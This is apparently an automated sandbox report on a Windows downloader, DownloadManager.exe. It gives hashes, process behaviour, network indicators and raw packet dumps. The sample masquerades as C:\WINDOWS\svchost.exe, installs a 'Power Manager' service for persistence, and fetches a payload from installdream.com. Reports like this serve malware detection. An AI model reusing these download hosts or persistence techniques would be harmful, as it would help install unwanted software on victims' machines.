Analysis Date2014-09-24 18:54:24
MD554eaf2f02645a74628a0565c032051d5
SHA1078e628740b5ee942b6fce256e7d75a36af47597

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: c478ded282b7727b350d4dc9b70eef9d sha1: 262134b4caa3cbcbb2ed220b2551f86243e798f1 size: 30720
Section.data md5: 8328e6b89d92f5b02ff6bafd33b353df sha1: 0f8a9256923c87c3641d825a3ab5fe23c4159ab3 size: 1024
Section.bss md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.idata md5: 7f8597beaa4a3fa27eb16a14218aea88 sha1: 1f3a302203ad32758ff6aee9e75ef716c3586266 size: 2560
Section.rsrc md5: 9d2636b634891843f3444c3db3dde542 sha1: e361a6b9c7e1658c70ec89b1ba345bc2f73b3614 size: 102400
Timestamp2001-08-24 15:00:00
VersionLegalCopyright: SOFTWARE AGILITY LIMITED
InternalName: DownloadManager
FileVersion: 2,0,0,214
CompanyName: SOFTWARE AGILITY LIMITED
ProductName: DownloadManager
ProductVersion: 2,0,0,214
OriginalFilename: DownloadManager.exe
PackerMicrosoft Visual Basic v6.0 DLL
PEhashf1fb8f351a2db16d2c3d19f274723f6a8b2a49ba
IMPhashd7401947d3623a2199a2114d62923cd5

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\WINDOWS\svchost.exe
Creates Process"C:\WINDOWS\svchost.exe" "C:\malware.exe"
Creates MutexGlobal\PowerManagerMutant

Process
↳ "C:\malware.exe"

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\config.xml
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\078e628740b5ee942b6fce256e7d75a36af47597_000908.log
Creates File\Device\Afd\AsyncConnectHlp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\config.xml
Creates MutexDMUploader
Winsock DNSinstalldream.com
Winsock DNSwww.test-landing.com

Process
↳ "C:\WINDOWS\svchost.exe" "C:\malware.exe"

Creates FileC:\malware.exe
Creates Process"C:\malware.exe"
Creates MutexGlobal\PowerManagerMutant
Creates ServicePower Manager - C:\WINDOWS\svchost.exe

Process
↳ C:\WINDOWS\svchost.exe

Creates FilePIPE\SfcApi
Creates Filepipe\net\NtControlPipe10
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\Setup.exe
Creates FileC:\malware.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Setup.exe
Creates MutexGlobal\PowerManagerMutant

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 816

Process
↳ Pid 864

Process
↳ C:\WINDOWS\System32\svchost.exe

Process
↳ Pid 1220

Process
↳ C:\WINDOWS\system32\spoolsv.exe

Process
↳ Pid 1880

Process
↳ Pid 1184

Network Details:

DNSwww.test-landing.com
Type: A
104.28.7.114
DNSwww.test-landing.com
Type: A
104.28.6.114
DNSinstalldream.com
Type: A
176.121.11.98
HTTP GEThttp://www.test-landing.com/api/wwwurl/1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
HTTP GEThttp://www.test-landing.com/api/wwwurl/1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
HTTP GEThttp://installdream.com/download/altBlankNet2.dat?version=2.0.0.214&dr=58f0d6bc444911e4bc8dXXXXXXXXXXXX
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
HTTP GEThttp://www.test-landing.com/api/wwwurl/1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
HTTP GEThttp://www.test-landing.com/api/wwwurl/1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
HTTP GEThttp://installdream.com/download/altBlankNet2.dat?version=2.0.0.214&dr=58f0d6bc444911e4bc8dXXXXXXXXXXXX?version=2.0.0.214&dr=58f0d6bd444911e4bc8dXXXXXXXXXXXX
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
HTTP GEThttp://www.test-landing.com/api/wwwurl/1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
HTTP GEThttp://www.test-landing.com/api/wwwurl/1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
HTTP GEThttp://installdream.com/download/altBlankNet2.dat?version=2.0.0.214&dr=58f0d6bc444911e4bc8dXXXXXXXXXXXX?version=2.0.0.214&dr=58f0d6bd444911e4bc8dXXXXXXXXXXXX?version=2.0.0.214&dr=58f0d6be444911e4bc8dXXXXXXXXXXXX
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
HTTP GEThttp://www.test-landing.com/api/wwwurl/1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
HTTP GEThttp://www.test-landing.com/api/wwwurl/1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
HTTP GEThttp://www.test-landing.com/api/wwwurl/1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
HTTP GEThttp://www.test-landing.com/api/wwwurl/1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Flows TCP192.168.1.1:1031 ➝ 104.28.7.114:80
Flows TCP192.168.1.1:1032 ➝ 104.28.7.114:80
Flows TCP192.168.1.1:1033 ➝ 176.121.11.98:80
Flows TCP192.168.1.1:1034 ➝ 104.28.7.114:80
Flows TCP192.168.1.1:1035 ➝ 104.28.7.114:80
Flows TCP192.168.1.1:1036 ➝ 176.121.11.98:80
Flows TCP192.168.1.1:1037 ➝ 104.28.7.114:80
Flows TCP192.168.1.1:1038 ➝ 104.28.7.114:80
Flows TCP192.168.1.1:1039 ➝ 176.121.11.98:80
Flows TCP192.168.1.1:1040 ➝ 104.28.7.114:80
Flows TCP192.168.1.1:1041 ➝ 104.28.7.114:80
Flows TCP192.168.1.1:1042 ➝ 104.28.7.114:80
Flows TCP192.168.1.1:1043 ➝ 104.28.7.114:80

Raw Pcap
0x00000000 (00000)   47455420 2f617069 2f777777 75726c2f   GET /api/wwwurl/
0x00000010 (00016)   31204854 54502f31 2e310d0a 55736572   1 HTTP/1.1..User
0x00000020 (00032)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000030 (00048)   352e3020 28636f6d 70617469 626c653b   5.0 (compatible;
0x00000040 (00064)   204d5349 4520392e 303b2057 696e646f    MSIE 9.0; Windo
0x00000050 (00080)   7773204e 5420362e 313b2054 72696465   ws NT 6.1; Tride
0x00000060 (00096)   6e742f35 2e30290d 0a486f73 743a2077   nt/5.0)..Host: w
0x00000070 (00112)   77772e74 6573742d 6c616e64 696e672e   ww.test-landing.
0x00000080 (00128)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x00000090 (00144)   20436c6f 73650d0a 0d0a                 Close....

0x00000000 (00000)   47455420 2f617069 2f777777 75726c2f   GET /api/wwwurl/
0x00000010 (00016)   31204854 54502f31 2e310d0a 55736572   1 HTTP/1.1..User
0x00000020 (00032)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000030 (00048)   352e3020 28636f6d 70617469 626c653b   5.0 (compatible;
0x00000040 (00064)   204d5349 4520392e 303b2057 696e646f    MSIE 9.0; Windo
0x00000050 (00080)   7773204e 5420362e 313b2054 72696465   ws NT 6.1; Tride
0x00000060 (00096)   6e742f35 2e30290d 0a486f73 743a2077   nt/5.0)..Host: w
0x00000070 (00112)   77772e74 6573742d 6c616e64 696e672e   ww.test-landing.
0x00000080 (00128)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x00000090 (00144)   20436c6f 73650d0a 0d0a                 Close....

0x00000000 (00000)   47455420 2f646f77 6e6c6f61 642f616c   GET /download/al
0x00000010 (00016)   74426c61 6e6b4e65 74322e64 61743f76   tBlankNet2.dat?v
0x00000020 (00032)   65727369 6f6e3d32 2e302e30 2e323134   ersion=2.0.0.214
0x00000030 (00048)   2664723d 35386630 64366263 34343439   &dr=58f0d6bc4449
0x00000040 (00064)   31316534 62633864 58585858 58585858   11e4bc8dXXXXXXXX
0x00000050 (00080)   58585858 20485454 502f312e 310d0a55   XXXX HTTP/1.1..U
0x00000060 (00096)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000070 (00112)   6c612f35 2e302028 636f6d70 61746962   la/5.0 (compatib
0x00000080 (00128)   6c653b20 4d534945 20392e30 3b205769   le; MSIE 9.0; Wi
0x00000090 (00144)   6e646f77 73204e54 20362e31 3b205472   ndows NT 6.1; Tr
0x000000a0 (00160)   6964656e 742f352e 30290d0a 486f7374   ident/5.0)..Host
0x000000b0 (00176)   3a20696e 7374616c 6c647265 616d2e63   : installdream.c
0x000000c0 (00192)   6f6d0d0a 436f6e6e 65637469 6f6e3a20   om..Connection: 
0x000000d0 (00208)   436c6f73 650d0a0d 0a                  Close....

0x00000000 (00000)   47455420 2f617069 2f777777 75726c2f   GET /api/wwwurl/
0x00000010 (00016)   31204854 54502f31 2e310d0a 55736572   1 HTTP/1.1..User
0x00000020 (00032)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000030 (00048)   352e3020 28636f6d 70617469 626c653b   5.0 (compatible;
0x00000040 (00064)   204d5349 4520392e 303b2057 696e646f    MSIE 9.0; Windo
0x00000050 (00080)   7773204e 5420362e 313b2054 72696465   ws NT 6.1; Tride
0x00000060 (00096)   6e742f35 2e30290d 0a486f73 743a2077   nt/5.0)..Host: w
0x00000070 (00112)   77772e74 6573742d 6c616e64 696e672e   ww.test-landing.
0x00000080 (00128)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x00000090 (00144)   20436c6f 73650d0a 0d0a2e31 3b205472    Close.....1; Tr
0x000000a0 (00160)   6964656e 742f352e 30290d0a 486f7374   ident/5.0)..Host
0x000000b0 (00176)   3a20696e 7374616c 6c647265 616d2e63   : installdream.c
0x000000c0 (00192)   6f6d0d0a 436f6e6e 65637469 6f6e3a20   om..Connection: 
0x000000d0 (00208)   436c6f73 650d0a0d 0a                  Close....

0x00000000 (00000)   47455420 2f617069 2f777777 75726c2f   GET /api/wwwurl/
0x00000010 (00016)   31204854 54502f31 2e310d0a 55736572   1 HTTP/1.1..User
0x00000020 (00032)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000030 (00048)   352e3020 28636f6d 70617469 626c653b   5.0 (compatible;
0x00000040 (00064)   204d5349 4520392e 303b2057 696e646f    MSIE 9.0; Windo
0x00000050 (00080)   7773204e 5420362e 313b2054 72696465   ws NT 6.1; Tride
0x00000060 (00096)   6e742f35 2e30290d 0a486f73 743a2077   nt/5.0)..Host: w
0x00000070 (00112)   77772e74 6573742d 6c616e64 696e672e   ww.test-landing.
0x00000080 (00128)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x00000090 (00144)   20436c6f 73650d0a 0d0a2e31 3b205472    Close.....1; Tr
0x000000a0 (00160)   6964656e 742f352e 30290d0a 486f7374   ident/5.0)..Host
0x000000b0 (00176)   3a20696e 7374616c 6c647265 616d2e63   : installdream.c
0x000000c0 (00192)   6f6d0d0a 436f6e6e 65637469 6f6e3a20   om..Connection: 
0x000000d0 (00208)   436c6f73 650d0a0d 0a                  Close....

0x00000000 (00000)   47455420 2f646f77 6e6c6f61 642f616c   GET /download/al
0x00000010 (00016)   74426c61 6e6b4e65 74322e64 61743f76   tBlankNet2.dat?v
0x00000020 (00032)   65727369 6f6e3d32 2e302e30 2e323134   ersion=2.0.0.214
0x00000030 (00048)   2664723d 35386630 64366263 34343439   &dr=58f0d6bc4449
0x00000040 (00064)   31316534 62633864 58585858 58585858   11e4bc8dXXXXXXXX
0x00000050 (00080)   58585858 3f766572 73696f6e 3d322e30   XXXX?version=2.0
0x00000060 (00096)   2e302e32 31342664 723d3538 66306436   .0.214&dr=58f0d6
0x00000070 (00112)   62643434 34393131 65346263 38645858   bd444911e4bc8dXX
0x00000080 (00128)   58585858 58585858 58582048 5454502f   XXXXXXXXXX HTTP/
0x00000090 (00144)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x000000a0 (00160)   204d6f7a 696c6c61 2f352e30 2028636f    Mozilla/5.0 (co
0x000000b0 (00176)   6d706174 69626c65 3b204d53 49452039   mpatible; MSIE 9
0x000000c0 (00192)   2e303b20 57696e64 6f777320 4e542036   .0; Windows NT 6
0x000000d0 (00208)   2e313b20 54726964 656e742f 352e3029   .1; Trident/5.0)
0x000000e0 (00224)   0d0a486f 73743a20 696e7374 616c6c64   ..Host: installd
0x000000f0 (00240)   7265616d 2e636f6d 0d0a436f 6e6e6563   ream.com..Connec
0x00000100 (00256)   74696f6e 3a20436c 6f73650d 0a0d0a     tion: Close....

0x00000000 (00000)   47455420 2f617069 2f777777 75726c2f   GET /api/wwwurl/
0x00000010 (00016)   31204854 54502f31 2e310d0a 55736572   1 HTTP/1.1..User
0x00000020 (00032)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000030 (00048)   352e3020 28636f6d 70617469 626c653b   5.0 (compatible;
0x00000040 (00064)   204d5349 4520392e 303b2057 696e646f    MSIE 9.0; Windo
0x00000050 (00080)   7773204e 5420362e 313b2054 72696465   ws NT 6.1; Tride
0x00000060 (00096)   6e742f35 2e30290d 0a486f73 743a2077   nt/5.0)..Host: w
0x00000070 (00112)   77772e74 6573742d 6c616e64 696e672e   ww.test-landing.
0x00000080 (00128)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x00000090 (00144)   20436c6f 73650d0a 0d0a4167 656e743a    Close....Agent:
0x000000a0 (00160)   204d6f7a 696c6c61 2f352e30 2028636f    Mozilla/5.0 (co
0x000000b0 (00176)   6d706174 69626c65 3b204d53 49452039   mpatible; MSIE 9
0x000000c0 (00192)   2e303b20 57696e64 6f777320 4e542036   .0; Windows NT 6
0x000000d0 (00208)   2e313b20 54726964 656e742f 352e3029   .1; Trident/5.0)
0x000000e0 (00224)   0d0a486f 73743a20 696e7374 616c6c64   ..Host: installd
0x000000f0 (00240)   7265616d 2e636f6d 0d0a436f 6e6e6563   ream.com..Connec
0x00000100 (00256)   74696f6e 3a20436c 6f73650d 0a0d0a     tion: Close....

0x00000000 (00000)   47455420 2f617069 2f777777 75726c2f   GET /api/wwwurl/
0x00000010 (00016)   31204854 54502f31 2e310d0a 55736572   1 HTTP/1.1..User
0x00000020 (00032)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000030 (00048)   352e3020 28636f6d 70617469 626c653b   5.0 (compatible;
0x00000040 (00064)   204d5349 4520392e 303b2057 696e646f    MSIE 9.0; Windo
0x00000050 (00080)   7773204e 5420362e 313b2054 72696465   ws NT 6.1; Tride
0x00000060 (00096)   6e742f35 2e30290d 0a486f73 743a2077   nt/5.0)..Host: w
0x00000070 (00112)   77772e74 6573742d 6c616e64 696e672e   ww.test-landing.
0x00000080 (00128)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x00000090 (00144)   20436c6f 73650d0a 0d0a4167 656e743a    Close....Agent:
0x000000a0 (00160)   204d6f7a 696c6c61 2f352e30 2028636f    Mozilla/5.0 (co
0x000000b0 (00176)   6d706174 69626c65 3b204d53 49452039   mpatible; MSIE 9
0x000000c0 (00192)   2e303b20 57696e64 6f777320 4e542036   .0; Windows NT 6
0x000000d0 (00208)   2e313b20 54726964 656e742f 352e3029   .1; Trident/5.0)
0x000000e0 (00224)   0d0a486f 73743a20 696e7374 616c6c64   ..Host: installd
0x000000f0 (00240)   7265616d 2e636f6d 0d0a436f 6e6e6563   ream.com..Connec
0x00000100 (00256)   74696f6e 3a20436c 6f73650d 0a0d0a     tion: Close....

0x00000000 (00000)   47455420 2f646f77 6e6c6f61 642f616c   GET /download/al
0x00000010 (00016)   74426c61 6e6b4e65 74322e64 61743f76   tBlankNet2.dat?v
0x00000020 (00032)   65727369 6f6e3d32 2e302e30 2e323134   ersion=2.0.0.214
0x00000030 (00048)   2664723d 35386630 64366263 34343439   &dr=58f0d6bc4449
0x00000040 (00064)   31316534 62633864 58585858 58585858   11e4bc8dXXXXXXXX
0x00000050 (00080)   58585858 3f766572 73696f6e 3d322e30   XXXX?version=2.0
0x00000060 (00096)   2e302e32 31342664 723d3538 66306436   .0.214&dr=58f0d6
0x00000070 (00112)   62643434 34393131 65346263 38645858   bd444911e4bc8dXX
0x00000080 (00128)   58585858 58585858 58583f76 65727369   XXXXXXXXXX?versi
0x00000090 (00144)   6f6e3d32 2e302e30 2e323134 2664723d   on=2.0.0.214&dr=
0x000000a0 (00160)   35386630 64366265 34343439 31316534   58f0d6be444911e4
0x000000b0 (00176)   62633864 58585858 58585858 58585858   bc8dXXXXXXXXXXXX
0x000000c0 (00192)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x000000d0 (00208)   4167656e 743a204d 6f7a696c 6c612f35   Agent: Mozilla/5
0x000000e0 (00224)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x000000f0 (00240)   4d534945 20392e30 3b205769 6e646f77   MSIE 9.0; Window
0x00000100 (00256)   73204e54 20362e31 3b205472 6964656e   s NT 6.1; Triden
0x00000110 (00272)   742f352e 30290d0a 486f7374 3a20696e   t/5.0)..Host: in
0x00000120 (00288)   7374616c 6c647265 616d2e63 6f6d0d0a   stalldream.com..
0x00000130 (00304)   436f6e6e 65637469 6f6e3a20 436c6f73   Connection: Clos
0x00000140 (00320)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f617069 2f777777 75726c2f   GET /api/wwwurl/
0x00000010 (00016)   31204854 54502f31 2e310d0a 55736572   1 HTTP/1.1..User
0x00000020 (00032)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000030 (00048)   352e3020 28636f6d 70617469 626c653b   5.0 (compatible;
0x00000040 (00064)   204d5349 4520392e 303b2057 696e646f    MSIE 9.0; Windo
0x00000050 (00080)   7773204e 5420362e 313b2054 72696465   ws NT 6.1; Tride
0x00000060 (00096)   6e742f35 2e30290d 0a486f73 743a2077   nt/5.0)..Host: w
0x00000070 (00112)   77772e74 6573742d 6c616e64 696e672e   ww.test-landing.
0x00000080 (00128)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x00000090 (00144)   20436c6f 73650d0a 0d0a3134 2664723d    Close....14&dr=
0x000000a0 (00160)   35386630 64366265 34343439 31316534   58f0d6be444911e4
0x000000b0 (00176)   62633864 58585858 58585858 58585858   bc8dXXXXXXXXXXXX
0x000000c0 (00192)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x000000d0 (00208)   4167656e 743a204d 6f7a696c 6c612f35   Agent: Mozilla/5
0x000000e0 (00224)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x000000f0 (00240)   4d534945 20392e30 3b205769 6e646f77   MSIE 9.0; Window
0x00000100 (00256)   73204e54 20362e31 3b205472 6964656e   s NT 6.1; Triden
0x00000110 (00272)   742f352e 30290d0a 486f7374 3a20696e   t/5.0)..Host: in
0x00000120 (00288)   7374616c 6c647265 616d2e63 6f6d0d0a   stalldream.com..
0x00000130 (00304)   436f6e6e 65637469 6f6e3a20 436c6f73   Connection: Clos
0x00000140 (00320)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f617069 2f777777 75726c2f   GET /api/wwwurl/
0x00000010 (00016)   31204854 54502f31 2e310d0a 55736572   1 HTTP/1.1..User
0x00000020 (00032)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000030 (00048)   352e3020 28636f6d 70617469 626c653b   5.0 (compatible;
0x00000040 (00064)   204d5349 4520392e 303b2057 696e646f    MSIE 9.0; Windo
0x00000050 (00080)   7773204e 5420362e 313b2054 72696465   ws NT 6.1; Tride
0x00000060 (00096)   6e742f35 2e30290d 0a486f73 743a2077   nt/5.0)..Host: w
0x00000070 (00112)   77772e74 6573742d 6c616e64 696e672e   ww.test-landing.
0x00000080 (00128)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x00000090 (00144)   20436c6f 73650d0a 0d0a3134 2664723d    Close....14&dr=
0x000000a0 (00160)   35386630 64366265 34343439 31316534   58f0d6be444911e4
0x000000b0 (00176)   62633864 58585858 58585858 58585858   bc8dXXXXXXXXXXXX
0x000000c0 (00192)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x000000d0 (00208)   4167656e 743a204d 6f7a696c 6c612f35   Agent: Mozilla/5
0x000000e0 (00224)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x000000f0 (00240)   4d534945 20392e30 3b205769 6e646f77   MSIE 9.0; Window
0x00000100 (00256)   73204e54 20362e31 3b205472 6964656e   s NT 6.1; Triden
0x00000110 (00272)   742f352e 30290d0a 486f7374 3a20696e   t/5.0)..Host: in
0x00000120 (00288)   7374616c 6c647265 616d2e63 6f6d0d0a   stalldream.com..
0x00000130 (00304)   436f6e6e 65637469 6f6e3a20 436c6f73   Connection: Clos
0x00000140 (00320)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f617069 2f777777 75726c2f   GET /api/wwwurl/
0x00000010 (00016)   31204854 54502f31 2e310d0a 55736572   1 HTTP/1.1..User
0x00000020 (00032)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000030 (00048)   352e3020 28636f6d 70617469 626c653b   5.0 (compatible;
0x00000040 (00064)   204d5349 4520392e 303b2057 696e646f    MSIE 9.0; Windo
0x00000050 (00080)   7773204e 5420362e 313b2054 72696465   ws NT 6.1; Tride
0x00000060 (00096)   6e742f35 2e30290d 0a486f73 743a2077   nt/5.0)..Host: w
0x00000070 (00112)   77772e74 6573742d 6c616e64 696e672e   ww.test-landing.
0x00000080 (00128)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x00000090 (00144)   20436c6f 73650d0a 0d0a3134 2664723d    Close....14&dr=
0x000000a0 (00160)   35386630 64366265 34343439 31316534   58f0d6be444911e4
0x000000b0 (00176)   62633864 58585858 58585858 58585858   bc8dXXXXXXXXXXXX
0x000000c0 (00192)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x000000d0 (00208)   4167656e 743a204d 6f7a696c 6c612f35   Agent: Mozilla/5
0x000000e0 (00224)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x000000f0 (00240)   4d534945 20392e30 3b205769 6e646f77   MSIE 9.0; Window
0x00000100 (00256)   73204e54 20362e31 3b205472 6964656e   s NT 6.1; Triden
0x00000110 (00272)   742f352e 30290d0a 486f7374 3a20696e   t/5.0)..Host: in
0x00000120 (00288)   7374616c 6c647265 616d2e63 6f6d0d0a   stalldream.com..
0x00000130 (00304)   436f6e6e 65637469 6f6e3a20 436c6f73   Connection: Clos
0x00000140 (00320)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f617069 2f777777 75726c2f   GET /api/wwwurl/
0x00000010 (00016)   31204854 54502f31 2e310d0a 55736572   1 HTTP/1.1..User
0x00000020 (00032)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000030 (00048)   352e3020 28636f6d 70617469 626c653b   5.0 (compatible;
0x00000040 (00064)   204d5349 4520392e 303b2057 696e646f    MSIE 9.0; Windo
0x00000050 (00080)   7773204e 5420362e 313b2054 72696465   ws NT 6.1; Tride
0x00000060 (00096)   6e742f35 2e30290d 0a486f73 743a2077   nt/5.0)..Host: w
0x00000070 (00112)   77772e74 6573742d 6c616e64 696e672e   ww.test-landing.
0x00000080 (00128)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x00000090 (00144)   20436c6f 73650d0a 0d0a3134 2664723d    Close....14&dr=
0x000000a0 (00160)   35386630 64366265 34343439 31316534   58f0d6be444911e4
0x000000b0 (00176)   62633864 58585858 58585858 58585858   bc8dXXXXXXXXXXXX
0x000000c0 (00192)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x000000d0 (00208)   4167656e 743a204d 6f7a696c 6c612f35   Agent: Mozilla/5
0x000000e0 (00224)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x000000f0 (00240)   4d534945 20392e30 3b205769 6e646f77   MSIE 9.0; Window
0x00000100 (00256)   73204e54 20362e31 3b205472 6964656e   s NT 6.1; Triden
0x00000110 (00272)   742f352e 30290d0a 486f7374 3a20696e   t/5.0)..Host: in
0x00000120 (00288)   7374616c 6c647265 616d2e63 6f6d0d0a   stalldream.com..
0x00000130 (00304)   436f6e6e 65637469 6f6e3a20 436c6f73   Connection: Clos
0x00000140 (00320)   650d0a0d 0a                           e....


Strings
CC
C:
.
9
041904b0
2,0,0,214
CompanyName
DownloadManager
DownloadManager.exe
&File
FileVersion
h&About ...
&Help
iE&xit
InternalName
jjjjj
Launcher
LAUNCHER
LegalCopyright
Microsoft Sans Serif
msctls_progress32
OriginalFilename
Please wait...
ProductName
ProductVersion
SOFTWARE AGILITY LIMITED
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
We're getting things ready. It can take up to 1 minute
|(::;<%
 !"$%&'
 !"#$%&'
 !"#$%&'.
 !"#$%&'()*+
 !"#$%&'))*+\
!!"##$%&
!"#$%&'
(	]#$%
)*+=-./
] !"#$%''))*+\-.
{;?=>?
}!;;<=
$	</$%
&)(,+-
#))*~|
#$%&'{)
++,-./
++\=./
 !"#$%&'()*+--.//012
/0123}
&0123456789:;
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVW
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;,=>?N`
 !"#$%&'()*+,-./0123;56789:;<=>?@ABCDEFGHIJKLMNOWQRSTUVWXYZ[\]^_`abcdefghijksmnopqrstuvwxyz{|}~
//0123|8
0123KM
''()*+,-./0123t56wf
/0123x5
()*,-./.0124567
0124567689:5%~?M*
()*,-./.0124567di{;<=>?
 !"#$%&'()*+--.//012r
)!"#0%&'2)*+3-./;123<567D9:;R=>?MABCZEFGWIJKNMNO`QRSaUVWiYZ[n]^_rabcfefg
 "$&(*,.02468:<>@BDFHJLNPRTVXZ\^`bdfhjlnprtvxz|~
,$.+0;2B4R6Y8i:p<
=;03BC
05155879<A>Ce<
06<>,892A52?
>0@6BHDNFTH^JxL
.,072|4
0a\4{|
?0AJCPErG
0cefg~
.//0d1
!&#0%>'`)n+
0ss(uvwxI{{
,1.:,,
!"#1%&'
10bad_typeid
1236567
/13579;=?ACEGIKMOQSUWY[]_a
!#%')+-/13579;=?ACEGIKMOQSUWY[]_acegikmoqsuwy{}
13579;=?ACEGIKMOQSUWY[]_ackmoqsuwy{}
-%1-3;5t7
13bad_exception
14__si_type_info
16__attr_type_info
16__func_type_info
16__ptmd_type_info
16__ptmf_type_info
16__user_type_info
17__array_type_info
17__class_type_info
,:/=1877
19__builtin_type_info
19__pointer_type_info
 1"#$%f'(9*+,/./51334567=9;;<=>?@
1hikkWs
1l3T567]9
1N0 EJK
1qjlmn
1UVGfjik=qn`nk_kCBTrsy4jzu:@
2'2&#'
+220ad
<23456
2468:<>@BDFHJLNPRTVXZ\^`bdFHJLNPRTVXZ\^`bdfhjlnprtvxz|~
?=25DE
2?>A7C8e[]LcbjflfCB41gwr7z
2B$C6D"6?;:L"HAKOK@TJQQ;
><2D3E
2F0`!U
2$ghhi
2GUKQO^`R` 
2HP?`b
~3}|}~
;#3+=>
33456789:;
'>345:6:
34567{9
34`{Cs
3=6G8\:i<p>
3BG<F:
3JIQMSM
3@KMN;
'44:<;?.@<@
/-"%45
4)698Q:e<x>
 4.%.(7
"47Md^hbpe]drsquDxzkHI
:"<(>.@4B:D@FFHLJRLXN^PdRjTpVvX|Z
4+b`{y
4[edZ9]a[9m_``np
4g''_m
<4>>@HBVDxF
4JP?bd
&;\4UV
 4"@$z&
5;;<%\
5,-./012
50*8/822
51=3,86H4
5;5;5 4=98J
(+@55bc`CWdiZik=o_ipp>GturCGtstwwVtnMN
567!j/;<
569=?t
5]789:;
5AB99<E
628W:|<
6^5d%_
(.	674
6$84:l<
6jCLE~
6K\`ef
6\l	wx;
6MqJ{<
 $$7**
7-./0123Q56
7>0>9=2;66
71V9IK
72u9!I
)=7.71
7goglA[ndA_sa
7<x	VW
-,-"#(8
$;+*<8<
)/8$0.*
8>6,'281;
89:>'C
8bad_cast
 8HLEIC
8K466@
?8mQRS
8o;<=>
<9:;<=>?
	9-*>0
9';188
93wC9s
9";*=4?=ADCNEYGgInKuM}O
;9:.8?
9bad_alloc
9cfgRP?jl
9C<M>d@qB
9E7E5IEI
9exception
9:$f??@
9:;G=>?XHBCPEFGTIJKTMNOXz
9MG>GA
#9P1QS
9pqtsk8v
9PXO~?
9type_info
/<A2AC
a6*$%&
aaacdst
?AABC7
?aabcdefghijkomno
_aabcdefgiijklmnoqqrs~
?[ABCa
[\]^_`abcdefg
$__`abcdefg\
?@ABCDEFG
]^_`abcdefghijk
?@ABCDEFGHIJKLMNO
